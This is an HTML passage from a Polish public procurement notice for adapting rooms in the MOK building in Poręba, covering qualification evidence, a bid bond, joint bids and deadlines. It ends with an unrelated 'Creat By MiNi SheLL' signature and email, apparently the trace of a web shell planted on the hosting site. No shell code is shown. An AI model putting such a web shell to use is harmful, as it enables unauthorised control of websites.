przygotowanie oferty, oferty częściowej lub wniosku<br/>o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie<br/>w zakresie pkt 4.1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2. Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania<br/>spełniania warunków udziału w postępowaniu (określonych przez Zamawiającego w<br/>ust. 3 niniejszego rozdziału SWZ), na podstawie art. 274 ust. 1 ustawy zostanie<br/>wezwany do złożenia następujących podmiotowych środków dowodowych (aktualnych<br/>na dzień ich złożenia):<br/>- w celu wykazania spełniania warunku z ust. 3.4.1<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których<br/>roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego<br/>nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Okres,<br/>o którym wyżej mowa liczy się wstecz od dnia, w którym upływa termin<br/>składania ofert.<br/>- w celu wykazania spełniania warunku z ust. 3.4.2.<br/>wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub<br/>kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacje o podstawie do<br/>dysponowania tymi osobami;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium w wysokości: 4 500,00 PLN (słownie: cztery<br/>tysiące pięćset złotych 00/100 groszy).<br/>1.1.Wadium może być wniesione w:<br/>a. pieniądzu,<br/>b. gwarancjach bankowych,<br/>c. gwarancjach ubezpieczeniowych,<br/>d. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz. U. z 2019 r. Nr 42 poz. 310).<br/>1.2.Termin wnoszenia wadium upływa w dniu 11.08.2022 r. o godz. 9:00.<br/>22<br/>2. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący<br/>numer<br/>konta: Śląski Bank Spółdzielczy Silesia w Katowicach 45 8437 0002 0130 0910<br/>7056 0003<br/>- z dopiskiem „Wadium w przetargu na zadanie: SENIOR „+” Adaptacja pomieszczeń<br/>w budynku MOK w Porębie”<br/>Uwaga nr 4:<br/>Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki<br/>pieniężne wpłyną na konto Zamawiającego przed upływem terminu składania ofert.<br/>3.Wadium wnoszone w postaci niepieniężnej należy złożyć wraz z ofertą poprzez<br/>Platformę przetargową - w wydzielonym, odrębnym pliku. Należy przekazać oryginał<br/>gwarancji lub poręczenia w postaci elektronicznej.<br/>Uwaga nr 5:<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, treść<br/>dokumentu wadialnego musi zapewniać możliwość zaspokojenia interesów<br/>Zamawiającego co oznacza, że uzyskanie zagwarantowanej zapłaty wadium musi<br/>obejmować wszystkie wskazane w ustawie przesłanki zatrzymania wadium, o których<br/>mowa w art. 98 ust. 6 ustawy, tj. działania lub zaniechania wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>4.Zwrot wadium z urzędu:<br/>Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od<br/>dnia wystąpienia jednej z okoliczności wskazanych w art. 98 ust. 1 pkt 1-3 ustawy.<br/>5.Zwrot wadium na wniosek Wykonawcy:<br/>Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia<br/>wniosku zwraca wadium Wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem Wykonawcy, którego oferta<br/>została wybrana jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte<br/>odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>Uwaga nr 6:<br/>Złożenie wniosku o zwrot wadium, powoduje rozwiązanie stosunku prawnego<br/>z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony<br/>prawnej, o których mowa w ustawie oraz rozdziale XXIX SWZ.<br/>5. Zatrzymanie wadium.<br/>Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium<br/>wniesionego w formie innej niż w pieniądzu, występuje odpowiednio do gwaranta lub<br/>poręczyciela z żądaniem zapłaty wadium, jeżeli:<br/>5.1.Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art.<br/>128 ust. 1 ustawy, z przyczyn leżących po jego stronie, nie złożył podmiotowych<br/>środków dowodowych lub przedmiotowych środków dowodowych potwierdzających<br/>okoliczności, o których mowa w art. 57 lub art. 106 ust. 1, oświadczenia, o którym<br/>mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na<br/>poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 ustawy, co spowodowało<br/>brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.<br/>23<br/>5.2.Wykonawca, którego oferta została wybrana:<br/>1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach<br/>określonych w ofercie;<br/>2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>5.3.Zawarcie umowy w sprawie niniejszego zamówienia publicznego stanie się<br/>niemożliwe z przyczyn leżących po stronie Wykonawcy.<br/>6. Jeżeli Wykonawca jest podmiotem niepodlegającym reżimowi prawa polskiego<br/>i właściwości sądów polskich, w treści gwarancji musi figurować zapis o poddaniu<br/>sporów wynikających z wadium prawu polskiemu i polskiemu sądownictwu. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki<br/>cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki<br/>wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się<br/>złożyć wraz z ofertą stosowne pełnomocnictwo – zgodnie z ust. 3.3. rozdz. XIV SWZ – nie<br/>dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w<br/>imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy<br/>podpiszą ofertę.<br/>Uwaga nr 1:<br/>16<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod<br/>taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia.<br/>4.Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego<br/>pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców<br/>oświadczenia, o których mowa w art. 125 ustawy (ust. 3.1. rozdziału XIV SWZ) składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają<br/>spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w<br/>postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania<br/>w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż:<br/>5.1.Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>5.2.Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu<br/>do danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza<br/>się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie<br/>składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich<br/>podmiotów.<br/>6. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym<br/>jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej<br/>umowy, zawiera załącznik nr 5 do SWZ.<br/>1.1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (tzw. zmiany kontraktowe w oparciu o art. 455<br/>ust. 1 pkt 1 ustawy) w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami<br/>zawartymi w załączniku nr 5 do SWZ.<br/>1.2. Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy.<br/>2. Przed zawarciem umowy należy dopełnić formalności, które zostały wskazane w Rozdziale XXVI SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-11 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamówienie należy zrealizować w terminie: do 5 miesięcy od dnia podpisania umowy

Creat By MiNi SheLL
Email: jattceo@gmail.com